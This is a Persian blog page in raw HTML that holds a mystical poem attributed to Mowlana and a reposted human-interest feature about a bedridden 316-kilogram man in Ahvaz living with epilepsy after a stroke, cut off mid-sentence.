none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </span></b> </strong> </div></div></div> <font style="font-size:8pt;"> <font size="3"><br> برچسب ها: <a href="/post/tag/تنهایی">تنهایی</a>، <a href="/post/tag/افسردگی">افسردگی</a>، <a href="/post/tag/عارفان">عارفان</a>،<br></font><br><br></font> </div> text/html 2017-06-21T08:47:14+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی درکش نکنى ، کعبه وُ بتخانه یکیست ... http://1001SHAYADOBAYAD.mihanblog.com/post/3523 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="6" face="Arial" color="#0000ff">&nbsp;&nbsp;درکش نکنى ، کعبه وُ بتخانه یکیست ...<span lang="fa">&nbsp; </span><br></font></span></b></b></p><p style="line-height: 90px; margin-top: 0; margin-bottom: 0"><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="6" face="Arial" color="#0000ff"><br> </font></span></b></b></p><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong> </strong><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><strong> <img src="http://s7.picofile.com/file/8252992642/B8R8N_KE_SHODY_1.jpg" alt="http://s7.picofile.com/file/8252992642/B8R8N_KE_SHODY_1.jpg" class="shrinkToFit" height="650" border="0" width="650"></strong></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s7.picofile.com/file/8252992976/B8R8N_KE_SHODY_2.jpg" alt="http://s7.picofile.com/file/8252992976/B8R8N_KE_SHODY_2.jpg" class="shrinkToFit" height="650" border="0" width="650"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8279413442/B8R8NE_P8EEZY_1.jpg" alt="http://s9.picofile.com/file/8279413442/B8R8NE_P8EEZY_1.jpg" height="425" border="0" width="650"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8298416368/B8R8N_11.jpg" alt="http://s9.picofile.com/file/8298416368/B8R8N_11.jpg" class="shrinkToFit" height="488" border="0" width="650"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8298416692/B8R8N_7.jpg" alt="http://s8.picofile.com/file/8298416692/B8R8N_7.jpg" class="shrinkToFit" height="595" border="0" width="650"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <b style="font-style: normal; font-variant: 56px; line-height: 56pxl; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="letter-spacing: 1pt; vertical-align: bottom; background-color: #FFFFCC"> <strong> <font size="4" face="Microsoft Sans Serif" color="#009900">&nbsp;باران که شدى مپرس ، این خانه ى کیست ... <br> سقف حرم و مسجد و میخانه یکیست ...<br> باران که شدى، پیاله ها را نشمار...<br> جام و قدح و کاسه و پیمانه یکیست ...<br> باران ! تو که از پیش خدا مى آیی<br> توضیح بده عاقل و فرزانه یکیست ...<br> بر درگه او چونکه بیفتند به خاک <br> شیر و شتر و پلنگ و پروانه یکیست <br> با سوره ى دل ، اگر خدارا خواندى <br> حمد و فلق و نعره ى مستانه یکیست <br> این بى خردان،خویش ، خدا مى دانند <br> اینجا سند و قصه و افسانه یکیست <br> از قدرت حق ، هرچه گرفتند به کار <br> در خلقت حق، رستم و موریانه یکیست <br> گر درک کنى خودت خدا را بینى <br> درکش نکنى , کعبه و بتخانه یکیست ... </font><font size="4" face="Microsoft Sans Serif" color="#00B700"><b><br> </b> </font> </strong> </span> </b> <font size="4" face="Microsoft Sans Serif" color="#009900"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> <strong> <span style="vertical-align: text-bottom"> «مولانا» </span> </strong> </b> </font> <b> <strong> </strong></b></p><b><strong> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong> </b> </div></div></div> text/html 2017-06-20T10:00:54+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی ماجرای سید موسی ۳۲۰ کیلوگرمی http://1001SHAYADOBAYAD.mihanblog.com/post/3522 <div class="post"> <div id="MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="tpost"><br></div> <div class="xpost"><div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <br><h3 style="text-align: center;" align="center"><font color="#000099"><span style="background-color: rgb(255, 255, 204);"><font size="6" face="Mihan-IransansBold">ماجرای <a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener">سید موسی ۳۲۰ کیلوگرمی</a></font></span></font></h3><h3 style="text-align: center;" align="right"><br></h3><p><br></p> <p style="text-align: right;"><a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-28374" src="http://www.dailys.ir/wp-content/uploads/2017/06/%D8%B3%DB%8C%D8%AF-%D9%85%D9%88%D8%B3%DB%8C-316-%D8%A8%D8%A7-%D9%88%D8%B1%D9%86-%DA%A9%DB%8C%D9%84%D9%88%DA%AF%D8%B1%D9%85%DB%8C-1.jpg" alt="-موسی-316-با-ورن-کیلوگرمی-1" title="Image of -موسی-316-با-ورن-کیلوگرمی-1" height="327" width="470"></a></p> <p style="text-align: center;" align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><strong><br></strong></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p style="text-align: right;" align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">باید با چشم دید تا باور کرد. مردی که به خاطر چاقی، ۹۰ ماه است روی یک تخت زندگی می کند. او به سختی می تواند تکان بخورد و تنها کاری که از عهده اش برمی آید، نشستن است، آن هم تنها برای چند دقیقه و بعد دراز می کشد. او شبانه روز روی کمر می خوابد و به سقف اتاق زل می زند. این مرد از اول زندگی اش چاق نبوده و یکدفعه و به صورت ناگهانی در طی چند سال، سرنوشتش تغییر می کند.</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> «<strong>سید موسی شریفی</strong>» برایمان از سیر تا پیاز زندگی اش می گوید. <a href="http://www.dailys.ir/category/%d8%af%d8%a7%d8%b3%d8%aa%d8%a7%d9%86-%da%a9%d9%88%d8%aa%d8%a7%d9%87/" target="_blank" rel="noopener">داستان</a> زندگی این مرد چاق شبیه قصه هاست اما با این تفاوت که این قصه واقعیت دارد.</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"></span></font> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-28375" src="http://www.dailys.ir/wp-content/uploads/2017/06/%D8%B3%DB%8C%D8%AF-%D9%85%D9%88%D8%B3%DB%8C-316-%D8%A8%D8%A7-%D9%88%D8%B1%D9%86-%DA%A9%DB%8C%D9%84%D9%88%DA%AF%D8%B1%D9%85%DB%8C-2.jpg" alt="-موسی-316-با-ورن-کیلوگرمی-2" title="Image of -موسی-316-با-ورن-کیلوگرمی-2" height="313" width="470"></a><br></font></span></font> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><strong>خانه ای بی خانواده!</strong></font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"></span></font> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><a href="http://www.dailys.ir/category/%d8%b3%d8%a8%da%a9-%d8%b2%d9%86%d8%af%da%af%db%8c/" target="_blank" rel="noopener">زندگی</a> موسی همانطوری بود که برایمان توصیف کرده بودند. یک خانه کوچک ۴۷ متری دارد که اتاق خواب، سالن و آشپزخانه اش یکی است! موسی می گوید این خانه را افراد خیر برای او سخته اند، مخصوص خودش؛ طوری که حمام و سرویس بهداشتی اش چسبیده به تخت دو نفره ای که تقریبا نیمی از خانه را اشغال کرده است.</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> آقا موسی <a href="http://www.dailys.ir/%d8%b1%d9%88%d8%b2-%d9%85%d8%b1%d8%af/" target="_blank" rel="noopener">مرد</a>ی است ۵۴ ساله بسیار تنها اما بسیار خوشرو و مهمان نواز. وقتی وارد خانه او می شویم به سختی می تواند بلند شود و بنشیند روی تخت. خانه و زندگی خیلی ساده و بی آلایشی دارد. همه زندگی او خلاصه می شود به همین چندتا عکسی که می بینید. بیش از ۵ سال است که شب و روز این مرد، به زندگی در همین ۴۷ متر خلاصه می شود. صدای مهربانی دارد. مرد ۳۱۶ کیلوگرمی گزارش ما، خودش بی پرس و جو همه رازها و اتفاق های زندگی اش را می ریزد روی دایره و می گوید: «<a href="http://www.dailys.ir/%d9%85%d8%aa%d9%86-%d9%88-%d8%a7%d8%b3-%d8%a7%d9%85-%d8%a7%d8%b3-%d8%b2%db%8c%d8%a8%d8%a7-%d8%a8%d8%b1%d8%a7%db%8c-%d8%af%d9%88%d8%b3%d8%aa-%d8%b5%d9%85%db%8c%d9%85%db%8c/" target="_blank" rel="noopener">دوست</a> داشتی بنویس، قصه من از سر سفره عقد شروع شد!»</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"></span></font> <span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><strong>۱۴ سال پیش؛ سر سفره عقد</strong></font></span><br><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> سال ۱۳۸۰ است. موسی وزنش ۱۰۰ کیلوگرم است و ماهی فروشی می کند. در یک روز گرم <a href="http://www.dailys.ir/%d9%81%d8%b5%d9%84-%d8%aa%d8%a7%d8%a8%d8%b3%d8%aa%d8%a7%d9%86/" target="_blank" rel="noopener">تابستان</a>ی شهر اهواز، آقا موسی در کنار دخترخانمی پای سفره بخت نشسته اند و عاقد دارد خطبه عقد را جاری می کند. عروس خانم رفته بود گل بچیند که آقا داماد یکباره غش کرد! آن روز، موسی جلوی چشمان ده ها نفر از اقوام و فامیل خود و همسر آینده اش، پای سفره عقد حالش دگرگون شد.</font></span><br><span style="background-color: rgb(204, 255, 255);"></span> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-28376" src="http://www.dailys.ir/wp-content/uploads/2017/06/%D8%B3%DB%8C%D8%AF-%D9%85%D9%88%D8%B3%DB%8C-316-%D8%A8%D8%A7-%D9%88%D8%B1%D9%86-%DA%A9%DB%8C%D9%84%D9%88%DA%AF%D8%B1%D9%85%DB%8C-3.jpg" alt="-موسی-316-با-ورن-کیلوگرمی-3" title="Image of -موسی-316-با-ورن-کیلوگرمی-3" height="314" width="470"></a></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p style="text-align: center;" align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><strong>مردی که ۸ سال آفتاب را ندیده</strong></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p style="text-align: right;" align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">سیاهی چشمان داماد ناپدید شد و با چشمانی یکدست سفید در حالی که تمام بدنش به رعشه و لرزه افتاده بود، آینه و شمعدان سفره عقد را ناخواسته شکست و کاسه <a href="http://www.dailys.ir/%d8%ae%d9%88%d8%a7%d8%b5-%d9%88-%d9%85%d8%b6%d8%b1%d8%a7%d8%aa-%d8%b9%d8%b3%d9%84-%d9%88-%d9%85%d9%88%d9%85-%d8%b9%d8%b3%d9%84/" target="_blank" rel="noopener">عسل</a> را واژگون کرد. کف سفید از دهان آقا داما سرازیر شد. بدنش به شدت می لرزید و پیش می رفت تا آنجا که تمام محتویات سفره زیر بدن موسی له شد.</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> همه میهمانان حیرت زده این منظره را تماشا می کردند. برخی ترسیده بودند و فریاد می کشیدند. از همه بیشتر، عروس خانم و خانواده داماد نگران بودند.</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> موسی از آن روز غم انگیز می گوید: «خودم نمی دانستم چه بلایی سرم آمده. وقتی چشمانم را باز کردم دیدم روی تخت بخش اورژانس بیمارستانم و بیشتر میهمان ها زل زده اند به من. از مادرم پرسیدم چه شده. مثل همیشه با صبر و حوصله پاسخ داد و گفت هیچی پسرم، به خیر گذشت.»</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> موسی وقتی هوش و حواسش سر جایش آمد حقیقت را از زبان مادر شنید.</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> داماد دچار بیماری صرع شده بود و زندگی اش از آن روز، زیر و رو شد: «آن دخترخانم وقتی متوجه شد که من بیماری صرع دارم دیگر حاضر به ازدواج نشد. مرا کنار گذاشتند. آنطور که خانواده عروس از من فاصله گرفته بودند کم کم خودم هم باورم شده بود که صرع احتمالا باید یک بیماری وحشتناک باشد! بعدها فهمیدم که درصد قابل توجهی از مردم به این بیماری مبتلا هستند و آنقدرها هم حاد نیست اما افسوس که دیگر دیر شده بود.»</font></span></font><br><font color="#000099"><span style="background-color: rgb(204, 255, 255);"></span></font> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-28377" src="http://www.dailys.ir/wp-content/uploads/2017/06/%D8%B3%DB%8C%D8%AF-%D9%85%D9%88%D8%B3%DB%8C-316-%D8%A8%D8%A7-%D9%88%D8%B1%D9%86-%DA%A9%DB%8C%D9%84%D9%88%DA%AF%D8%B1%D9%85%DB%8C-4.jpg" alt="-موسی-316-با-ورن-کیلوگرمی-4" title="Image of -موسی-316-با-ورن-کیلوگرمی-4" height="399" width="470"></a></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p style="text-align: center;" align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><strong>عکس های جدید چاق ترین مرد ایران مهمان <a href="http://www.dailys.ir/%d8%a8%d8%b1%d9%86%d8%a7%d9%85%d9%87-%d9%85%d8%a7%d9%87-%d8%b9%d8%b3%d9%84/" target="_blank" rel="noopener">برنامه ماه عسل</a> ۹۶</strong></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> <strong>دومین حادثه ناگوار</strong></font><font size="4"><br><font face="Mihan-IransansBold"> موسی بعد از آن اتفاق گوشه گیر شد و افسرده. تنها مونس موسی، مادرش بود که دو سال بعد، او هم موسی را برای همیشه تنها گذاشت. غم از دست دادن <a href="http://www.dailys.ir/%d8%a7%d8%b3-%d8%a7%d9%85-%d8%a7%d8%b3-%d9%88-%d9%85%d8%aa%d9%86-%d8%ac%d8%af%db%8c%d8%af-%d8%b2%db%8c%d8%a8%d8%a7-%d8%af%d8%b1-%d9%88%d8%b5%d9%81-%d9%85%d8%a7%d8%af%d8%b1/" target="_blank" rel="noopener">مادر</a>، آنقدر برای آقاموسی غیرقابل هضم بود که ماهی فروشی را رها کرد و در کنج خانه در سوگ مادر نشست. سال ۸۶ بود و ۴ سال از درگذشت مادر موسی می گذشت. موسی شده بود یک مرد ۲۰۰ کیلویی. در خانه می نشست و به چند مشتری اندکی که برایش باقی مانده بود <a href="http://www.dailys.ir/%d8%ae%d9%88%d8%a7%d8%b5-%d9%88-%d9%85%d8%b6%d8%b1%d8%a7%d8%aa-%d8%a7%d9%86%d9%88%d8%a7%d8%b9-%d9%85%d8%a7%d9%87%db%8c/" target="_blank" rel="noopener">ماهی</a> می فروخت: «ناامید بودم. به هیچ چیز فکر نمی کردم. تنها چیزی که مرا راضی می کرد گوشه گیری و عزلت بود. به همه آدم ها بی اعتماد شده بودم. تنها «تنهایی» مرا آرام می کرد.»</font><br><font face="Mihan-IransansBold"> موسی به زندگی ریاضت کونه خود ادامه می داد و حتی فکرش را هم نمی کرد که چه اتفاق و چه سرنوشت تلخی در انتظارش است.</font><br><font face="Mihan-IransansBold"> <a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-28378" src="http://www.dailys.ir/wp-content/uploads/2017/06/%D8%B3%DB%8C%D8%AF-%D9%85%D9%88%D8%B3%DB%8C-316-%D8%A8%D8%A7-%D9%88%D8%B1%D9%86-%DA%A9%DB%8C%D9%84%D9%88%DA%AF%D8%B1%D9%85%DB%8C-5.jpg" alt="-موسی-316-با-ورن-کیلوگرمی-5" title="Image of -موسی-316-با-ورن-کیلوگرمی-5" height="429" width="470"></a></font><br><font face="Mihan-IransansBold"> <strong>علتی عجیب برای چاق شدن</strong></font><br><font face="Mihan-IransansBold"> سال ۸۶ موسی سکته کرد، سکته مغزی. این اتفاق، بیماری صرع او را حادتر کرد و بدتر از همه، این عارضه مغزی باعث شد بیماری خاموش دیگری در وجود موسی ریشه دوانده بود حادتر و خطرناکتر شود. بیماری خطرناکی به نام چاقی: «بعد از آن حادثه، طی دو سال وزنم به ۲۶۸ کیلو رسید. از طرفی بعد از سکته، پاهایم لمس شده و بی جان.</font><br><font face="Mihan-IransansBold"> نمی توانستم راه بروم. صرع هم لحظه ای رهایم نمی کرد و روزی چند مرتبه دچار حمله صرعی می شدم. وقتی حمله به سراغم می آمد از تخت می افتادم پایین. وزنم زیاد بود و به همین خاطر چندین بار انگشتانم شکست. صرع از یک طرف و چاقی از سوی دیگر محاصره ام کرده بود. زمینگیر شده بودم. از پس کارهای روزمره ام هم برنمی آمدم. دیگر به آخر خط رسیده بودم که چند خیر پیدا شدند و مرا از آن فلاکت و بدبختی بیرون کشیدند. بعد از آن، تحت درمان قرار گرفتم.</font><br><font face="Mihan-IransansBold"> پزشکان گفتند به خاطر عارضه مغزی و مشکلات عصبی روند چاقی ادامه دارد و ارتباطی به میزان غذایم ندارد. من خیلی کم خوراکم. بیشتر روزها روزه ام اما باز هم پزشکان برایم یک رژیم سبزیجاتی تجویز کردند که جواب هم نداد. بعد از آن، من ماندم و یک خانه ۴۷ متری که با مقداری پس انداز خودم و کمک دوستان خیر ساخته شد. این خانه در واقع قفس و زندان من شد. این دو تخت دو نفره را که می بینید برای این اینجاست که هنگام حمله های صرعی سقوط نکنم با آن گاری کوچک کنار تخت هم مرا جابجا می کنند برای استحمام.»</font><br><font face="Mihan-IransansBold"> <a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener"><img class="aligncenter size-full wp-image-28379" src="http://www.dailys.ir/wp-content/uploads/2017/06/%D8%B3%DB%8C%D8%AF-%D9%85%D9%88%D8%B3%DB%8C-316-%D8%A8%D8%A7-%D9%88%D8%B1%D9%86-%DA%A9%DB%8C%D9%84%D9%88%DA%AF%D8%B1%D9%85%DB%8C-6.jpg" alt="-موسی-316-با-ورن-کیلوگرمی-6" title="Image of -موسی-316-با-ورن-کیلوگرمی-6" height="371" width="470"></a></font><br><font face="Mihan-IransansBold"> <strong>۹۰ ماه تنهایی</strong></font><br><font face="Mihan-IransansBold"> موسی نمی تواند از جایش تکان بخورد. این روزها وزنش شده ۳۱۶ کیلوگرم. اهالی و همسایه ها برای او غذا و خوراکی می آورند. البته برخی از روزها هم هیچ کس در خانه موسی را نمی زند و <a href="http://www.dailys.ir/%d8%b3%db%8c%d8%af-%d9%85%d9%88%d8%b3%db%8c-320-%da%a9%db%8c%d9%84%d9%88%da%af%d8%b1%d9%85%db%8c/" target="_blank" rel="noopener">سید موسی</a> آن روز را روزه می گیرد. مرد ۳۱۶ کیلویی، زمانی میاندار و نوحه خوان عزای حسینی بوده ولی الان می گوید تنها نوای نوحه ها او را آرام می کند. تنها چیزی که موسی را در شب های <a href="http://www.dailys.ir/%d8%aa%d9%86%d9%87%d8%a7%db%8c%db%8c/" target="_blank" rel="noopener">تنهایی</a> به آرامش می رساند، گوش دادن به نواهای حسینی و اشک ریختن به خاطر مظلومیت سالار شهیدان است.</font><br><font face="Mihan-IransansBold"> «۹۰ ماه است که رنگ آفتاب و مهتاب را ندیده ام و در این خانه محبوسم. ۶ سالی می شود که دهه محرم در خانه ام. دلم می خواهد مثل آنوقت ها به هیات بروم. سفر کنم به مشهد الرضا (ع) و به پابوس امام غریب بروم اما چه بگویم که قسمتم اینگونه بود.»</font><br><font face="Mihan-IransansBold"> آقا موسی این روزها به شدت با بیماری و البته فقر و تنگدستی دست و پنجه نرم می کند. ماهی دو سه بار حمام می رود. می گوید یک پرستار دارد که او را حمام می کند و هر بار باید به او ۲۰ تا 